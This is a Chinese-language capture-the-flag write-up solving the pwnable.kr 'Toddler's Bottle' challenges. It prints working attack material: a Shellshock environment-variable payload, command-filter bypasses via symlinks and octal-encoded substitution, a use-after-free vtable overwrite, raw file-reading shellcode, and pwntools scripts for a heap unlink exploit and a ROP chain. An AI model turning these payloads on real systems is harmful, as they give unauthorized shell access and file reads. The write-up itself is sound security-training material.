Toddler’s Bottle
leg
关键在于 pc 的计算。不像 x86 里 pc 总是指向下一条指令的地址,ARM 中的 pc 是下下条。假设当前指令地址为 x,即
- ARM 模式:pc = x + 8
- Thumb 模式:pc = x + 4
按这个规则计算得到 key1() + key2() + key3() = 0x8ce4 + 0x8d0c + 0x8d80 = 0x1A770,输入就好了
108400
mistake
因为运算符优先级问题,fd 被赋值成 0,也就是 stdin,和 password 文件就没有关系了,可以输入
1111111111 0000000000
shellshock
该题源自 bash 的任意指令执行的安全漏洞,摘自维基百科
Initial report (CVE-2014-6271)
This original form of the vulnerability (CVE-2014-6271) involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function.[33] The vulnerability can be tested with the following command:
env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”
In systems affected by the vulnerability, the above commands will display the word “vulnerable” as a result of Bash executing the command “echo vulnerable”, which was embedded into the specially crafted environment variable named “x”.[8][34]
env x='() { :;}; /bin/cat flag' ./shellshock
coin1
比较单纯的算法题?按题目要求的做就行了,用 pwntools 处理输入输出,最后再 ssh 上去跑一下 jio 本
from pwn import *
import re
def weigh(conn, s, e):
coin_list = [str(i) for i in range(s, e+1)] # [s, e]
s = " ".join(coin_list).encode()
conn.sendline(s)
output = conn.recvline().decode()
result = re.search("(\d+)", output).groups()
assert(len(result) > 0)
return int(result[0])
def guess(conn, N, C):
s = 0
e = N-1
for i in range(C):
m = int((s + e) / 2)
# print('s:', s, ",e:", e, ",m:", m)
w = weigh(conn, s, m)
# print("w:", w)
if w == (m - s + 1) * 10: # all real
s = m + 1
else:
e = m
return (int)((s + e) / 2)
def main():
# setup conn
context.log_level = 'debug'
conn = remote('pwnable.kr', 9007)
conn.recvuntil('Ready')
while True:
output = conn.recvline_regex('N=(\d+) C=(\d+)').decode()
n, c = re.search('N=(\d+) C=(\d+)', output).groups()
answer = guess(conn, int(n), int(c))
conn.sendline(str(answer).encode())
conn.recvuntil('Correct!')
main()
blackjack
给了一个源码的网页,网页已经失效了,但是可以在网站时光机上找到,然后在这坨代码里翻啊翻,你就会看到有问题的函数
int betting() { //Asks user amount to bet
printf("\n\nEnter Bet: $");
scanf("%d", &bet);
if (bet > cash) { //If player tries to bet more money than player has
printf("\nYou cannot bet more money than you have.");
printf("\nEnter Bet: ");
scanf("%d", &bet);
return bet;
}
else
return bet;
} // End Function
可以看到第二次输入的 bet 没有作校验就返回了。所以在进入游戏后 bet 直接输入 1000000,判断失败后再输一次 1000000,赢了就好了。输入 -1000000,然后输掉也行……
lotto
虽然规则说得比较玄乎,但是代码的两个 for 循环还是暴露了……一开始还想着 urandom 里有没有什么 bug。只要你的输入能押对随机出的六个字节中的一个就能过关,并且值的范围已经缩小到了 1~45,所以直接试几次就好了……
int match = 0, j = 0;
for(i=0; i<6; i++){
for(j=0; j<6; j++){
if(lotto[i] == submit[j]){
match++;
}
}
}
from pwn import *
import re
context.log_level = 'debug'
conn = process('/home/lotto/lotto')
conn.recvuntil('3. Exit')
while True:
conn.sendline('1')
conn.recvuntil('Submit your 6 lotto bytes :')
conn.send(' '*6) # 6 倍的快乐
conn.recvuntil('bad luck...')
cmd1
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "flag")!=0;
r += strstr(cmd, "sh")!=0;
r += strstr(cmd, "tmp")!=0;
return r;
}
int main(int argc, char* argv[], char** envp){
putenv("PATH=/thankyouverymuch");
if(filter(argv[1])) return 0;
system( argv[1] );
return 0;
}
随便跑到 /tmp 下
ln -s /home/cmd1/flag f
创建一个符号链接,然后
~/cmd1 "/bin/cat f"
就好了……
cmd2
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
比起 1 里更进一步,直接删除了进程中所有环境变量,这就导致必须用到路径分隔符。而代码里又限制了直接传入 ‘/’,所以就要考虑转义字符之类。可以将 ‘/’ 编码后利用 printf 输出。同上,先到 /tmp 下面新建一个 flag 文件的符号链接
~/cmd2 "\$(printf '\057bin\057cat \057tmp\057subdir\057f')"
其中 \057 就是 ‘/’ 的八进制编码,同时在 $ 前面加上反斜杠,这样 $ 就能在第一次执行时保留下来。
uaf
看上去不是堆溢出的。那么就要先释放掉对象 m 和 w,然后再给 data 分配内存,让 data 的地址和 m 的地址一致,然后触发 m->introduce() 即可。
当然,也要构造 data 的内容,具体就从虚表下手了。
文件中分配给 m 的空间是 0x18 字节,测试了一下发现分配 data 时只要大小不超过 0x18,new 两次得到的地址就和 m 相同(当然 m 需要先 delete)。第一步完成。
调用 m->introduce() 时会先从 *m 处取到虚表的地址,查看类的定义,introduce 函数是表中的第二项,那么实际上就会先取得 *m(即 Man 类的虚表地址),然后取 *m + sizeof(void*) * 2 作为 introduce 函数的地址。所以我们把指向虚表的地址往前挪一下,就会变成 (*m – sizeof(void*)) + sizeof(void*) * 2,以为调用 introduce 就会调到 give_shell,因为 give_shell 函数是表中第一项。而 *m 固定为 0x401570,所以填入 0x401568 就行了。
printf "\x68\x15\x40\x00" > /tmp/in.txt ./uaf 24 /tmp/in.txt 3 // 触发 delete 2 2 // 两次 new 1 // 调用 "introduce"
memcpy
照着提示试一遍,发现程序会崩溃。检查一下可以发现是 sse 指令遇到非 16 字节对齐的内存地址时引起的。所以要求 malloc 出来给 dest 的地址 16 字节对齐。源码开头贴心的给出了编译选项,照着编一个二进制出来试一试就行。比如第 4 次分配 64 字节时是对齐的,第 5 次分配 128 字节时就不对齐了(发现多余了 8 字节),那么第 4 次就分配 64+8 字节,因为堆需要多分配 8 字节保留控制信息,后面以此类推
8 16 32 72 136 264 520 1032 2056 4096
asm
只使用 open read write 函数,写 shellcode 读 flag 文件。
可用的内存空间固定为 0x41414000~0x41415000。
shellcode 的写入范围为 0x4141402e~0x41414416(代码中写死的 1000 字节读取长度)
文件名的字符串可以紧跟着 shellcode,不过需要根据最后写完的 shellcode 调整字符串偏移
// 实际连到 nc 0 9026 时路径要改成 "/home/asm_pwn/..."
char* ppath = // 太鸡儿长了,折一下
"/home/asm/this_is_pwnable.kr_flag_file_please_read_this_file.sorry_"
"the_file_name_is_very_looooooooooooooooooooooooooooooooooooooooooooooo"
"ooooooooooooooooooooooooooooo0000000000000000000000000oooooooooooooooo"
"ooooooo000000000000o0o0o0o0o0o0ong";
__asm__ __volatile__ (
"mov $2, %%rax\n"
"mov %0, %%rdi\n"
"mov $0, %%rsi\n"
"syscall\n" // open 的系统调用,ppath 就是文件路径,实际字符串紧跟在 shellcode 后面
"mov %%rax, %%rdi\n"
"mov $0, %%rax\n"
"mov $0x41414400, %%rsi\n"
"mov $100, %%rdx\n"
"syscall\n" // read,读 100 字节到 0x41414400 这个缓冲区
"mov $1, %%rax\n"
"mov $1, %%rdi\n"
"mov $0x41414400, %%rsi\n"
"mov $100, %%rdx\n"
"syscall\n" // write,输出到 stdout
::"c"(ppath));
比较操蛋的是在 asm 目录下通过(./asm < 1.txt)已经成功了但换到 nc 0 9026 改用 pwntools 脚本却没成功,搞来搞去最后用管道可以了…… 下面的字节码对应上面的汇编,
\x2F\x68\x6F
开始就是路径字符串内容,调用 open 时需要设 rdi 为字符串地址,前面说到 shellcode 从 0x4141402e 开始,这样就能算出字符串实际位置在哪。
python -c 'print("\x48\x8D\x05\x57\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x48\x89\xC1\x48\xC7\xC0\x02\x00\x00\x00\x48\x89\xCF\x48\xC7\xC6\x00\x00\x00\x00\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x00\x44\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x48\xC7\xC6\x00\x44\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x0F\x05\xCC\x2F\x68\x6F\x6D\x65\x2F\x61\x73\x6D\x5F\x70\x77\x6E\x2F\x74\x68\x69\x73\x5F\x69\x73\x5F\x70\x77\x6E\x61\x62\x6C\x65\x2E\x6B\x72\x5F\x66\x6C\x61\x67\x5F\x66\x69\x6C\x65\x5F\x70\x6C\x65\x61\x73\x65\x5F\x72\x65\x61\x64\x5F\x74\x68\x69\x73\x5F\x66\x69\x6C\x65\x2E\x73\x6F\x72\x72\x79\x5F\x74\x68\x65\x5F\x66\x69\x6C\x65\x5F\x6E\x61\x6D\x65\x5F\x69\x73\x5F\x76\x65\x72\x79\x5F\x6C\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6F\x30\x6F\x30\x6F\x30\x6F\x30\x6F\x30\x6F\x30\x6F\x6E\x67\x00\x0a")' > /tmp/1.txt
cat /tmp/1.txt - | nc 0 9026
unlink
堆溢出。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct tagOBJ{
struct tagOBJ* fd;
struct tagOBJ* bk;
char buf[8];
}OBJ;
void shell(){
system("/bin/sh");
}
void unlink(OBJ* P){
OBJ* BK;
OBJ* FD;
BK=P->bk;
FD=P->fd;
FD->bk=BK;
BK->fd=FD;
}
int main(int argc, char* argv[]){
malloc(1024);
OBJ* A = (OBJ*)malloc(sizeof(OBJ));
OBJ* B = (OBJ*)malloc(sizeof(OBJ));
OBJ* C = (OBJ*)malloc(sizeof(OBJ));
// double linked list: A <-> B <-> C
A->fd = B;
B->bk = A;
B->fd = C;
C->bk = B;
printf("here is stack address leak: %p\n", &A);
printf("here is heap address leak: %p\n", A);
printf("now that you have leaks, get shell!\n");
// heap overflow!
gets(A->buf);
// exploit this unlink!
unlink(B);
return 0;
}
因为 unlink 时会操作链表的前向和后向节点,那么不管我把 BK 还是 FD 调整为 shell 函数的地址都会在 FD->bk=BK 和 BK->fd=FD 之一触发写入异常,因为代码段是不可写的。把它们写成堆缓冲区再建立跳板的 shellcode 也不行,因为有 dep。。。这里卡了好久。。。毕竟代码里能劫持的只有 unlink 的 ret 了。后来才想到 main 函数的 ret 也可以做手脚。
; main 中调用 unlink 的地方 0x080485ef <+192>: pushl -0xc(%ebp) 0x080485f2 <+195>: call 0x8048504 <unlink> 0x080485f7 <+200>: add $0x10,%esp 0x080485fa <+203>: mov $0x0,%eax 0x080485ff <+208>: mov -0x4(%ebp),%ecx 0x08048602 <+211>: leave 0x08048603 <+212>: lea -0x4(%ecx),%esp 0x08048606 <+215>: ret
从 unlink 返回后绕圈子把 ebp 赋值给了 esp 然后 ret,而这个 ebp 在调用 unlink 时会保存到栈上,就有机会可以修改它了。三个 obj 对象 A B C 在堆上的布局是连续的
0 4 8 16 24 +----+----+--------+--------+---- | fd | bk | buf | <heap> | fd +----+----+--------+--------+----
payload 从 A 的 buf 开始算
A+0x8 AAAA A+0xc AAAA A+0x10 AAAA A+0x14 AAAA A+0x18 <A的堆地址+0x28> // OBJ 对象 B,同时也是 B 的 fd A+0x1c <A的栈地址-0x1c> A+0x20 \xeb\x84\x04\x08 A+0x24 <A的堆地址+0x24> A+0x28 <A的堆地址+0x24>
A的栈地址减去 0x1c 正好就是 unlink 函数中 main 的 ebp 保存的位置,\xeb\x84\x04\x08 是 shell 函数的地址,后面两个地址则是在上面 main 函数 ebp 的两次跳转中用到。
from pwn import *
import re
context.log_level = 'debug'
conn = process('/home/unlink/unlink')
stack = conn.recvregex('here is stack address leak: 0x([a-f0-9]+)\n').decode()
stack_addr = int(re.search('here is stack address leak: 0x([a-f0-9]+)', stack).groups()[0], 16)
heap = conn.recvregex('here is heap address leak: 0x([a-f0-9]+)\n').decode()
heap_addr = int(re.search('here is heap address leak: 0x([a-f0-9]+)', heap).groups()[0], 16)
print stack_addr, heap_addr
conn.recvuntil('now that you have leaks, get shell!')
d = 'A'*16
d += p32(heap_addr + 0x28)
d += p32(stack_addr - 0x1c)
d += p32(0x80484eb)
d += p32(heap_addr + 0x24)
d += p32(heap_addr + 0x24)
conn.sendline(d)
conn.interactive()
blukat
脑筋急转弯式的题目,因为 blukat 用户已经设置到 blukat_pwn 组里了,password 文件一开始就有读取权限,只不过输出的文件内容很有迷惑性……所以读出来然后输入就好了,代码还故意留了个缓冲区溢出的幌子。
horcruxes
代码初始化了一堆随机值然后要求输入的值等于它们的总和,显然生成随机数没漏洞的话肯定是办不到的。然后 ropme 函数里有一段看似可以利用的代码,可以溢出后覆盖函数返回地址跳转到箭头处执行。
else {
printf("How many EXP did you earned? : ");
gets(s); // char s[100];
if ( atoi(s) == sum ) {
=> fd = open("flag", 0);
s[read(fd, s, 0x64u)] = 0;
puts(s);
close(fd);
exit(0);
}
puts("You'd better get more experience to kill Voldemort");
}
但实际上因为
fd = open("flag", 0);
所在地址是 0x80a010b,包含的 0a 正好是换行符会被 gets 截断所以行不通。
正好代码中有 A – G 七个函数会打印出各个随机数的值,而且它们的函数地址也没有特殊字符,所以可以分别返回到这些函数里,算出 sum 后输入即可。
# -*- coding: utf-8 -*-
from pwn import *
import re
context.log_level = 'debug'
#conn = process('/home/horcruxes/horcruxes')
conn = remote('127.0.0.1', 9032)
conn.recvuntil('Select Menu:')
conn.sendline('0')
conn.recvuntil('How many EXP did you earned? :')
p = 'a'*120
p += p32(0x809fe4b) # A 的函数地址
p += p32(0x809fe6a) # B
p += p32(0x809fe89) # C
p += p32(0x809fea8) # D
p += p32(0x809fec7) # E
p += p32(0x809fee6) # F
p += p32(0x809ff05) # G
p += p32(0x809fffc) # main() 中调用 ropme() 的地址,因为 ropme 的入口地址含 0a
conn.sendline(p)
data = conn.recv(1024)
data = conn.recv(1024)
data = conn.recv(1024, timeout=5.0)
print 'data:', data
exp = re.findall('EXP \+(-?\d+)', data, re.S)
print 'exp:', exp
sum = 0
for e in exp:
sum += int(e)
print 'sum=', sum & 0xffffffff
conn.interactive()
